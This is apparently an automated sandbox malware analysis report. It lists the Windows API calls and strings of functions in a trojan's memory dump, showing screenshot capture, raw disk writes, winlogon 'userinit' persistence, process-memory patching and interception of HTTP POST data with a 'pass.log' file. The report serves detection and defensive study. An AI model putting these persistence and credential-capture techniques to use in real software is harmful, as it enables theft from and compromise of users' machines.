                                                                                                                                                                                                              • #680.SHELL32 ref: 013004EC
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 013004FD
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 01300504
                                                                                                                                                                                                              • _snprintf.MSVCRT(?,00000104,%s\%02d.bmp,?,00000001), ref: 01300532
                                                                                                                                                                                                              • Sleep.KERNEL32(00000FA0,?), ref: 01300548
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast$Path$#680CreateDirectoryFolderMakeSystem$BackslashSleep_snprintf
                                                                                                                                                                                                              • String ID: %s\%02d.bmp$61C5C165$scrs
                                                                                                                                                                                                              • API String ID: 3389723127-1538338398
                                                                                                                                                                                                              • Opcode ID: 7b311867b511185e4ddf346cbf81fe34ae78c1272a13c69c668398474a43c556
                                                                                                                                                                                                              • Instruction ID: adcbbf8486a5ed8ddc367e54ffa75b21aaa90ce11a81a3e9be5f4fd8ba604c1f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7b311867b511185e4ddf346cbf81fe34ae78c1272a13c69c668398474a43c556
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AF3138315042285BCB31EF789C68BEABBECBF55744F454098F984E3245DEB0DA84CBA0
                                                                                                                                                                                                              Function 012EC5C9 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 101sleepwindowthreadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetWindow.USER32(?,00000005,00000001), ref: 012EC53D
                                                                                                                                                                                                              • GetWindow.USER32(00000000), ref: 012EC540
                                                                                                                                                                                                              • IsWindowVisible.USER32(00000000), ref: 012EC545
                                                                                                                                                                                                              • IsWindowVisible.USER32(00000000), ref: 012EC554
                                                                                                                                                                                                              • GetWindowThreadProcessId.USER32(00000000,?), ref: 012EC567
                                                                                                                                                                                                              • GetClassNameA.USER32(00000000,?,00000101), ref: 012EC589
                                                                                                                                                                                                              • GetWindowInfo.USER32(00000000,?), ref: 012EC5F5
                                                                                                                                                                                                              • SetWindowLongA.USER32(00000000,000000EC,?), ref: 012EC617
                                                                                                                                                                                                              • SetLayeredWindowAttributes.USER32(00000000,0000FFFF,000000FF,00000002), ref: 012EC626
                                                                                                                                                                                                              • GetClassLongA.USER32(00000000,000000E6), ref: 012EC62F
                                                                                                                                                                                                              • SetClassLongA.USER32(00000000,000000E6,00000000), ref: 012EC642
                                                                                                                                                                                                              • Sleep.KERNEL32(00000000), ref: 012EC64A
                                                                                                                                                                                                              • EnumChildWindows.USER32(00000000,Function_0000C4B0,00000000), ref: 012EC658
                                                                                                                                                                                                              • GetWindow.USER32(00000000,00000003), ref: 012EC661
                                                                                                                                                                                                              • Sleep.KERNEL32(00000001), ref: 012EC66F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$ClassLong$SleepVisible$AttributesChildEnumInfoLayeredNameProcessThreadWindows
                                                                                                                                                                                                              • String ID: <
                                                                                                                                                                                                              • API String ID: 3510281082-4251816714
                                                                                                                                                                                                              • Opcode ID: e1b5c5d5125f1fed242080303613a8736c38b8d1943ed3aedb09f2c1d8c91aea
                                                                                                                                                                                                              • Instruction ID: 61a58e2dc5ff951ba2f3f42b31dfcde9b3c8386a60d56a896bfef6542779c2b7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e1b5c5d5125f1fed242080303613a8736c38b8d1943ed3aedb09f2c1d8c91aea
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2531C330660612AFEB35AEA89C4EFEF77ACEF45721F500118F716E20C4DBB496108B64
                                                                                                                                                                                                              Function 012F3530 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 97stringthreadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,0000040C), ref: 012F3550
                                                                                                                                                                                                              • GetLogicalDriveStringsA.KERNEL32(00000104,?), ref: 012F3598
                                                                                                                                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 012F35AE
                                                                                                                                                                                                              • GetCurrentThread.KERNEL32(00000002), ref: 012F35B6
                                                                                                                                                                                                              • SetThreadPriority.KERNEL32(00000000), ref: 012F35BD
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(0133DDB4,?,00000005), ref: 012F35DF
                                                                                                                                                                                                              • GetDriveTypeA.KERNEL32(0133DDB4), ref: 012F35E6
                                                                                                                                                                                                                • Part of subcall function 012F33F0: memset.MSVCRT(?,00000000,00000103), ref: 012F3411
                                                                                                                                                                                                                • Part of subcall function 012F33F0: GetDriveTypeA.KERNEL32 ref: 012F3428
                                                                                                                                                                                                                • Part of subcall function 012F33F0: SetCurrentDirectoryA.KERNEL32 ref: 012F3438
                                                                                                                                                                                                                • Part of subcall function 012F33F0: _snprintf.MSVCRT(00000000,00000104,\\.\PhysicalDrive%u,?), ref: 012F3465
                                                                                                                                                                                                                • Part of subcall function 012F33F0: CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000003,A0000000,00000000), ref: 012F3487
                                                                                                                                                                                                                • Part of subcall function 012F33F0: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012F34B1
                                                                                                                                                                                                                • Part of subcall function 012F33F0: LockFile.KERNEL32(00000000,00000000,00000000,00000104,00000000), ref: 012F34C0
                                                                                                                                                                                                                • Part of subcall function 012F33F0: WriteFile.KERNEL32(00000000,00000000,00000104,00000000,00000000), ref: 012F34D9
                                                                                                                                                                                                                • Part of subcall function 012F33F0: UnlockFile.KERNEL32(00000000,00000000,00000000,00000104,00000000), ref: 012F34EA
                                                                                                                                                                                                                • Part of subcall function 012F33F0: GetHandleInformation.KERNEL32(00000000,?), ref: 012F3507
                                                                                                                                                                                                                • Part of subcall function 012F33F0: CloseHandle.KERNEL32(00000000), ref: 012F3518
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(0133DDB4,?,00000005), ref: 012F362F
                                                                                                                                                                                                              • GetDriveTypeA.KERNEL32(0133DDB4), ref: 012F3636
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$Drive$Type$CurrentHandleThreadlstrcpynmemset$CloseCreateDirectoryErrorInformationLockLogicalModePointerPriorityStringsUnlockWrite_snprintf
                                                                                                                                                                                                              • String ID: AppEvents$Console$Control Panel$Environment$Identities$Software$System
                                                                                                                                                                                                              • API String ID: 1338089429-328203234
                                                                                                                                                                                                              • Opcode ID: 8287d3a7bbc4a9f6d219002d26345d26c23bb8b9eca09c2b4766bd50858fd518
                                                                                                                                                                                                              • Instruction ID: e515f24c5a361c490b8a98e3e3fa1efc2aec15c633ecda56c8a69fbdfc32ef34
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8287d3a7bbc4a9f6d219002d26345d26c23bb8b9eca09c2b4766bd50858fd518
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0B314DB59102259FDB20EFA8EC4D7EEBAB8FF4470CF81416CEB0596240D7704A49CB99
                                                                                                                                                                                                              Function 012E8560 Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 82libraryloadersynchronizationCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,00000103), ref: 012E857E
                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 012E8586
                                                                                                                                                                                                              • _snprintf.MSVCRT(00000000,00000104,Global\HighMemoryEvent_%08x,00000000), ref: 012E859E
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,?), ref: 012E85B2
                                                                                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 012E85D2
                                                                                                                                                                                                              • GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?), ref: 012E85F3
                                                                                                                                                                                                              • SetNamedSecurityInfoA.ADVAPI32(?,00000006,00000010,00000000,00000000,00000000,00000000), ref: 012E8612
                                                                                                                                                                                                              • LocalFree.KERNEL32(?), ref: 012E861C
                                                                                                                                                                                                              • SetErrorMode.KERNEL32(00000002), ref: 012E8624
                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(winmm.dll,waveOutOpen), ref: 012E8634
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 012E863B
                                                                                                                                                                                                              • WriteProcessMemory.KERNEL32(000000FF,00000000,?,00000006,00000000), ref: 012E865D
                                                                                                                                                                                                                • Part of subcall function 01305930: GetCurrentThread.KERNEL32(00000020,00000000,012E358E,75C8DB30,?,?,?,?,012E358E,?,?,012E3751), ref: 01305940
                                                                                                                                                                                                                • Part of subcall function 01305930: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,012E358E,?,?,012E3751), ref: 01305947
                                                                                                                                                                                                                • Part of subcall function 01305930: GetCurrentProcess.KERNEL32(00000020,012E358E,?,?,?,?,012E358E,?,?,012E3751), ref: 01305957
                                                                                                                                                                                                                • Part of subcall function 01305930: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,012E358E,?,?,012E3751), ref: 0130595E
                                                                                                                                                                                                                • Part of subcall function 01305930: LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 01305981
                                                                                                                                                                                                                • Part of subcall function 01305930: AdjustTokenPrivileges.ADVAPI32(012E358E,00000000,00000001,00000000,00000000,00000000), ref: 0130599B
                                                                                                                                                                                                                • Part of subcall function 01305930: GetLastError.KERNEL32 ref: 013059A5
                                                                                                                                                                                                                • Part of subcall function 01305930: CloseHandle.KERNEL32(012E358E), ref: 013059B6
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ProcessSecurity$CurrentDescriptorToken$ErrorOpenThread$AddressAdjustCloseConvertCreateFreeHandleInfoLastLibraryLoadLocalLookupMemoryModeMutexNamedPrivilegePrivilegesProcSaclStringValueWrite_snprintfmemset
                                                                                                                                                                                                              • String ID: Global\HighMemoryEvent_%08x$S:(ML;;NRNWNX;;;LW)$waveOutOpen$winmm.dll
                                                                                                                                                                                                              • API String ID: 848744509-1707559921
                                                                                                                                                                                                              • Opcode ID: 51c8771fc622373229ea98a9a41615dc9d767a50c78bc096807d11b5e8af0fa5
                                                                                                                                                                                                              • Instruction ID: cfd4383715e4aa6b0f3080ab94a45892c57781381ba830f41608808058e6987c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 51c8771fc622373229ea98a9a41615dc9d767a50c78bc096807d11b5e8af0fa5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BC215E71A40309AFEB30AF94DC4AFEE777DAB04B05F508548F705AA1C4DBB09644CBA1
                                                                                                                                                                                                              Function 013031C0 Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 67sleepsynchronizationthreadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}), ref: 013031EC
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 013031FD
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 01303211
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0130321F
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00023080,00000000,00000000,00000000), ref: 01303234
                                                                                                                                                                                                              • Sleep.KERNEL32(00009C40), ref: 01303245
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0130324A
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 0130325E
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0130326C
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61C5C435), ref: 01303277
                                                                                                                                                                                                              • Sleep.KERNEL32(00009C40,61C5C435,RFK), ref: 01303291
                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 0130329A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Handle$Sleep$CloseInformationMutex$BackslashCreateObjectOpenPathReleaseSingleThreadWait
                                                                                                                                                                                                              • String ID: 61C5C435$Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}$P0Mw$RFK
                                                                                                                                                                                                              • API String ID: 505831200-2085081953
                                                                                                                                                                                                              • Opcode ID: cad4f50e17d959ced0f6c5c800c9ed6b4f21b7ddb9b59aed0f2f40c75508341f
                                                                                                                                                                                                              • Instruction ID: 85867aa1b38db1649bc748a37c2ad4594aa69f0a7d39c3893bb203d10605bb4e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cad4f50e17d959ced0f6c5c800c9ed6b4f21b7ddb9b59aed0f2f40c75508341f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9A1106301863167FE2327B659C1AF5F7AEC7F09B19F10810CF650A11C4DBE0960087AA
                                                                                                                                                                                                              Function 012F5090 Relevance: 27.1, APIs: 18, Instructions: 133memorynetworkCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000C10,774D3050,774D30D0,774D3080), ref: 012F50B7
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 012F50BA
                                                                                                                                                                                                              • memset.MSVCRT(00000000,00000000,00000C10), ref: 012F50CE
                                                                                                                                                                                                              • inet_addr.WS2_32(?), ref: 012F50F5
                                                                                                                                                                                                              • GetTcpTable.IPHLPAPI(00000000,00000C00,00000001), ref: 012F5113
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012F511D
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012F5120
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012F512D
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012F5130
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000C13), ref: 012F5148
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 012F514F
                                                                                                                                                                                                              • memset.MSVCRT(00000000,00000000,00000C13), ref: 012F515F
                                                                                                                                                                                                              • GetTcpTable.IPHLPAPI(00000000,00000C00,00000001), ref: 012F5175
                                                                                                                                                                                                              • htons.WS2_32(00000000), ref: 012F51A1
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000C00), ref: 012F51D1
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012F51D4
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000C00), ref: 012F51E4
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012F51E7
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$AllocFreeTableValidatememset$htonsinet_addr
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1718479325-0
                                                                                                                                                                                                              • Opcode ID: 094d44b459ab5abd19127ec4f6e0c9fed80b4552d04f19259344c89ad671f874
                                                                                                                                                                                                              • Instruction ID: 8adeadacf73490a5bb3e930cc5031ecd7d670ff3a5ae2fd3ca01d1afce03d7c0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 094d44b459ab5abd19127ec4f6e0c9fed80b4552d04f19259344c89ad671f874
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8C418F71910316ABEB30AF69CC48FAFBB6CAF44750F15812CFB0597285DB75A641CBA0
                                                                                                                                                                                                              Function 012F5200 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 210stringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,?), ref: 012F5250
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,?), ref: 012F527C
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,?), ref: 012F52A3
                                                                                                                                                                                                              • IsBadReadPtr.KERNEL32(?,00000005), ref: 012F52D4
                                                                                                                                                                                                              • strstr.MSVCRT(?,), ref: 012F52FD
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,Content-Length: ), ref: 012F5315
                                                                                                                                                                                                              • StrToIntA.SHLWAPI(-00000010), ref: 012F5323
                                                                                                                                                                                                              • memcpy.MSVCRT(00000000,?,00000004), ref: 012F5355
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: QueryVirtual$Readmemcpystrstr
                                                                                                                                                                                                              • String ID: $Content-Length: $POST
                                                                                                                                                                                                              • API String ID: 2509092961-2076583852
                                                                                                                                                                                                              • Opcode ID: 0ff090ac6d3db6bb54d9f0bac52837ffe7f6fae5a7d559330b73669047fafcdf
                                                                                                                                                                                                              • Instruction ID: ffc829de866519d307a974aea1595df0dcdc80d2dd644045f1806a7cfb25023d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0ff090ac6d3db6bb54d9f0bac52837ffe7f6fae5a7d559330b73669047fafcdf
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3D716C71E1031AAFDB20DFA8D984AAEFBF8FB48704F04412DEA44E7245D774A9018F94
                                                                                                                                                                                                              Function 01304A10 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 175registryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathFileExistsA.SHLWAPI(01339B58,774D30D0,00000000), ref: 01304A43
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000002,software\microsoft\windows nt\currentversion\winlogon,00000000,00000103,?,75980180), ref: 01304A6D
                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,userinit,00000000,00000000,00000000,00000000), ref: 01304A8D
                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,userinit,00000000,00000000,00000000,00000000), ref: 01304ABA
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,01339B58), ref: 01304ABE
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,userinit,00000000,00000001,00000000,00000002), ref: 01304B60
                                                                                                                                                                                                                • Part of subcall function 012F41B0: GetProcessHeap.KERNEL32(00000000,00000000,7597EA50,01304B6D), ref: 012F41BE
                                                                                                                                                                                                                • Part of subcall function 012F41B0: HeapValidate.KERNEL32(00000000), ref: 012F41C1
                                                                                                                                                                                                                • Part of subcall function 012F41B0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 012F41CE
                                                                                                                                                                                                                • Part of subcall function 012F41B0: HeapFree.KERNEL32(00000000), ref: 012F41D1
                                                                                                                                                                                                              • RegFlushKey.ADVAPI32(?), ref: 01304B71
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 01304B7B
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Value$ProcessQuery$CloseExistsFileFlushFreeOpenPathValidate
                                                                                                                                                                                                              • String ID: software\microsoft\windows nt\currentversion\winlogon$software\microsoft\windows\currentversion\run$userinit
                                                                                                                                                                                                              • API String ID: 579956326-3814317876
                                                                                                                                                                                                              • Opcode ID: 7f636223a24a43732f8902b93ce3c49dfbdaac1c9788ba9998cb5f9281aa0864
                                                                                                                                                                                                              • Instruction ID: 5d7587554def6a97328d88a43eb364d35d1fbb3d18c1d90c04ca8949578abb04
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7f636223a24a43732f8902b93ce3c49dfbdaac1c9788ba9998cb5f9281aa0864
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0651DC75604206BFEB22AF689C68FFABBFDEF44708F104158FA4197245E6719B05C790
                                                                                                                                                                                                              Function 012FE1B0 Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 167stringthreadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,00000103,?,00000000,?), ref: 012FE1D1
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,<L>,?,00000000,?), ref: 012FE209
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61C5C0CB), ref: 012FE23D
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61C5C0CB), ref: 012FE273
                                                                                                                                                                                                              • PathFileExistsA.SHLWAPI(00000000), ref: 012FE2B9
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,012FB980,00000000,00000000,00000000,00000000,00000000), ref: 012FE338
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 012FE350
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012FE361
                                                                                                                                                                                                              • strstr.MSVCRT(00000000,bsi.dll,?,00000000,?), ref: 012FE387
                                                                                                                                                                                                              • memcpy.MSVCRT(00000000,00000000,012F8F74), ref: 012FE3C4
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Path$BackslashHandle$CloseCreateExistsFileInformationThreadmemcpymemsetstrstr
                                                                                                                                                                                                              • String ID: 61C5C0CB$<L>$POST$bsi.dll$pass.log
                                                                                                                                                                                                              • API String ID: 4177962767-3724775876
                                                                                                                                                                                                              • Opcode ID: 0fd2831e03d02e06aaf3cb882dcd58a6bc69e2c1667b77ebfe38c885f8a104be
                                                                                                                                                                                                              • Instruction ID: 7e2cfe3054a01a5f32ddc6ff5d169184f1e232b54a3feba7c23b0dfe36132e14
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0fd2831e03d02e06aaf3cb882dcd58a6bc69e2c1667b77ebfe38c885f8a104be
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4251283151021A9BDB32AF38E81CBEAFBE8FB44705F16416CEB4497291DBB1D944CB94
                                                                                                                                                                                                              Function 012F3800 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 164memoryfileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,00000103,774D0F00,00000000,00000000), ref: 012F3821
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,00000103,774D0F00,00000000,00000000), ref: 012F383C
                                                                                                                                                                                                              • GetTempPathA.KERNEL32(00000104,?,?,?,?,774D0F00,00000000,00000000), ref: 012F3856
                                                                                                                                                                                                              • GetTempFileNameA.KERNEL32(?,00000000,00000000,?,?,?,?,774D0F00,00000000,00000000), ref: 012F386C
                                                                                                                                                                                                                • Part of subcall function 012E6C70: memset.MSVCRT(?,00000000,000000FF,00000000), ref: 012E6CA1
                                                                                                                                                                                                                • Part of subcall function 012E6C70: memset.MSVCRT(?,00000000,00000103,?,00000000,000000FF,00000000), ref: 012E6CBF
                                                                                                                                                                                                                • Part of subcall function 012E6C70: RegOpenKeyExA.ADVAPI32(80000002,software\microsoft,00000000,00000101,?,?,?,?,?,?,00000000), ref: 012E6CDB
                                                                                                                                                                                                                • Part of subcall function 012E6C70: RegQueryValueExA.ADVAPI32(?,9E2B3B9Fa,00000000,00000001,?,00000104,?,?,?,?,?,00000000), ref: 012E6D02
                                                                                                                                                                                                                • Part of subcall function 012E6C70: GetProcessHeap.KERNEL32(00000008,00000110,?,?,?,?,?,?,?,00000000), ref: 012E6D7A
